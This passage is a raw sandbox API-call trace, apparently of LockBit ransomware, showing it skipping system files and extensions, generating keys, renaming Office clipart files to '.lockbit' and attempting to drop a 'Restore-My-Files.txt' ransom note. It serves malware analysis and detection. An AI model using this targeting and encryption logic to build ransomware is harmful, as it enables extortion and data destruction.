lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.632] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.632] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.632] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.632] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.632] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.632] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.632] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.632] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.632] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.632] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.632] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.632] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.633] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.633] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.634] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.634] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.634] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.634] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.634] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.634] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.634] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.634] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.634] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.634] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.634] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.634] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107328.WMF") returned 1 [0141.634] lstrcmpiW (lpString1="ntldr", lpString2="J0107328.WMF") returned 1 [0141.634] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107328.WMF") returned 1 [0141.634] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107328.WMF") returned -1 [0141.634] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107328.WMF") returned -1 [0141.634] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107328.WMF") returned 1 [0141.634] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107328.WMF") returned -1 [0141.634] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.634] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF") returned=".WMF" [0141.634] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.635] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.635] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.636] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.636] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.636] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.636] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.636] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.636] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.636] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF.lockbit") returned 72 [0141.636] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107328.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0141.641] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.641] malloc (_Size=0x40068) returned 0x3d70450 [0141.641] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=6532) returned 1 [0141.641] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.642] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0141.642] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.642] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0141.642] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0141.679] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.679] malloc (_Size=0xa6) returned 0x77d7a8 [0141.679] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.683] free (_Block=0x77d7a8) [0141.683] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.683] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.683] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.683] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56393f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1094, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107342.WMF", cAlternateFileName="")) returned 1 [0141.684] lstrcmpiW (lpString1=".", lpString2="J0107342.WMF") returned -1 [0141.684] lstrcmpiW (lpString1="..", lpString2="J0107342.WMF") returned -1 [0141.684] PathFindExtensionW (pszPath="J0107342.WMF") returned=".WMF" [0141.684] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.684] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.685] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.685] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107342.WMF") returned 1 [0141.685] lstrcmpiW (lpString1="ntldr", lpString2="J0107342.WMF") returned 1 [0141.685] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107342.WMF") returned 1 [0141.685] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107342.WMF") returned -1 [0141.685] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107342.WMF") returned -1 [0141.685] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107342.WMF") returned 1 [0141.685] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107342.WMF") returned -1 [0141.685] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.685] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF") returned=".WMF" [0141.685] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.686] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.686] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.686] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF.lockbit") returned 72 [0141.686] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107342.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0141.687] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.687] malloc (_Size=0x40068) returned 0x3df0008 [0141.687] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4244) returned 1 [0141.687] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.688] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.688] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.688] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.688] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.693] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.693] malloc (_Size=0xa6) returned 0x77d7a8 [0141.693] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0141.694] free (_Block=0x77d7a8) [0141.694] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.694] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.694] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.694] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56393f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x13d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107344.WMF", cAlternateFileName="")) returned 1 [0141.694] lstrcmpiW (lpString1=".", lpString2="J0107344.WMF") returned -1 [0141.694] lstrcmpiW (lpString1="..", lpString2="J0107344.WMF") returned -1 [0141.694] PathFindExtensionW (pszPath="J0107344.WMF") returned=".WMF" [0141.695] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.695] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.695] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107344.WMF") returned 1 [0141.696] lstrcmpiW (lpString1="ntldr", lpString2="J0107344.WMF") returned 1 [0141.696] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107344.WMF") returned 1 [0141.696] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107344.WMF") returned -1 [0141.696] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107344.WMF") returned -1 [0141.696] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107344.WMF") returned 1 [0141.696] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107344.WMF") returned -1 [0141.696] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.696] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF") returned=".WMF" [0141.696] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.696] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.696] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.697] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.697] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF.lockbit") returned 72 [0141.697] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF" (normalized: 